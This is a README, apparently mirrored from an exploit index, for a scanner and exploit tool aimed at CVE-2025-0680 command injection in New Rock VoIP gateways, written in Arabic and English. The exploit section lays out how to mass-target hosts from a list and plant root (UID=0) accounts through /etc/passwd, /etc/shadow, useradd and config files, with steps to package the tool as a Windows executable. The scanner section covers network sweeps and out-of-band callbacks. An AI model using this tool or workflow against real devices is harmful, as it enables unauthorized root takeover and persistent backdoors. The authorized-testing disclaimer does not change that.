Share
## https://sploitus.com/exploit?id=3D675A19-A605-5D50-92D8-EBA3F656E0F6
# CVE-2025-0680 — Scanner + Exploit
## New Rock Technologies MX8G / OM500 / NRP1302 - Cloud RPC Command Injection

---

## 🔴 EXPLOIT (استغلال) — حقن مستخدمين بصلاحيات root

### ملفات الإدخال المطلوبة

| الملف | الصيغة | الوصف |
|---|---|---|
| `ip.txt` | `ip` أو `ip:port` أو `ip:port http/https` | قائمة الأجهزة المستهدفة |
| `usrt.txt` | `username:password` | قائمة المستخدمين للحقن |

### المنفذ الافتراضي
> إذا لم يُحدد منفذ → يستخدم **443 (HTTPS)** تلقائياً

### ⚡ التشغيل (Python مباشرة)

```powershell
# 1. تأكد من وجود ip.txt و usrt.txt في نفس المجلد
# 2. ثبت المتطلبات
pip install -r requirements.txt
# 3. شغّل
python cve-2025-0680_exploit.py
```

### 🔨 تحويل إلى EXE

```powershell
# الطريقة 1: سكريبت البناء التلقائي
.\build_exe.bat

# الطريقة 2: يدوياً
pip install -r requirements.txt
python build_exe.py
# ثم انسخ ip.txt و usrt.txt إلى مجلد dist\
copy ip.txt dist\ && copy usrt.txt dist\

# التشغيل:
.\dist\CVE-2025-0680_Exploit.exe
```

> **هام**: الـ EXE يقرأ `ip.txt` و `usrt.txt` من **نفس المجلد** الموجود فيه.

### آلية الاستغلال
1. **فحص الاتصال** → يتأكد أن الجهاز شغّال
2. **البحث عن ناقل الحقن** → يختبر 18 endpoint + 10 wrappers
3. **جمع معلومات الجهاز** → Kernel, OS, hostname, network
4. **حقن المستخدم** → UID=0 (صلاحيات root كاملة) عبر:
   - `/etc/passwd` + `/etc/shadow`
   - `useradd` / `adduser`
   - ملفات config الويب
   - ملفات XML
5. **التحقق** → يتأكد أن المستخدم أضيف بنجاح
6. **تقرير** → يولد ملف `exploit_report_*.txt`

---

## 🟡 SCANNER (فحص)

### 📋 الاستخدام (Arabic)

```powershell
# 1. تثبيت المتطلبات
pip install -r requirements.txt

# 2. فحص جهاز محدد (مثل جهازك 192.168.4.6)
python cve-2025-0680_scanner.py --target 192.168.4.6

# 3. فحص شبكة كاملة
python cve-2025-0680_scanner.py --cidr 192.168.1.0/24

# 4. فحص متقدم مع DNS Out-of-Band
python cve-2025-0680_scanner.py --target 192.168.4.6 --aggressive --collab your-domain.burpcollab.net

# 5. استخدام HTTP بدلاً من HTTPS
python cve-2025-0680_scanner.py --target 192.168.4.6 --http --port 80

# 6. فحص بقائمة أجهزة من ملف
python cve-2025-0680_scanner.py --list targets.txt
```

### 📋 Usage (English)

```powershell
# 1. Install requirements
pip install -r requirements.txt

# 2. Scan a single target
python cve-2025-0680_scanner.py --target 192.168.4.6

# 3. Scan network CIDR
python cve-2025-0680_scanner.py --cidr 192.168.1.0/24

# 4. Aggressive mode with DNS OOB
python cve-2025-0680_scanner.py --target 192.168.4.6 --aggressive --collab your-domain.burpcollab.net

# 5. Use HTTP instead of HTTPS
python cve-2025-0680_scanner.py --target 192.168.4.6 --http --port 80

# 6. Scan targets from file
python cve-2025-0680_scanner.py --list targets.txt
```

### 🔧 Arguments

| Argument | Short | Description | Default |
|---|---|---|---|
| `--target` | `-t` | Target IP/hostname | — |
| `--cidr` | `-c` | Network CIDR (e.g., 192.168.1.0/24) | — |
| `--list` | `-l` | File with targets (one per line) | — |
| `--port` | `-p` | Port number | 443 |
| `--http` | — | Use HTTP (not HTTPS) | False |
| `--sleep` | — | Sleep seconds for time-based detection | 5 |
| `--aggressive` | `-a` | Enable deep testing + OOB | False |
| `--collab` | — | DNS collaborator host for OOB testing | — |
| `--threads` | — | Concurrent threads | 10 |
| `--timeout` | — | Request timeout (seconds) | 10 |
| `--quiet` | `-q` | Minimal output | False |
| `--version` | — | Show version | — |

### ⚠️ Warning / تحذير

**This tool is for authorized security testing ONLY.**
**هذه الأداة للاختبارات الأمنية المصرّح بها فقط.**

Use only on devices you own or have written permission to test.
استخدم فقط على أجهزة تملكها أو لديك إذن رسمي باختبارها.

### 📊 Output

The scanner generates a detailed `.txt` report with:
- Device fingerprinting results
- Discovered endpoints
- Injection test results
- Command execution proof (if vulnerable)
- Remediation recommendations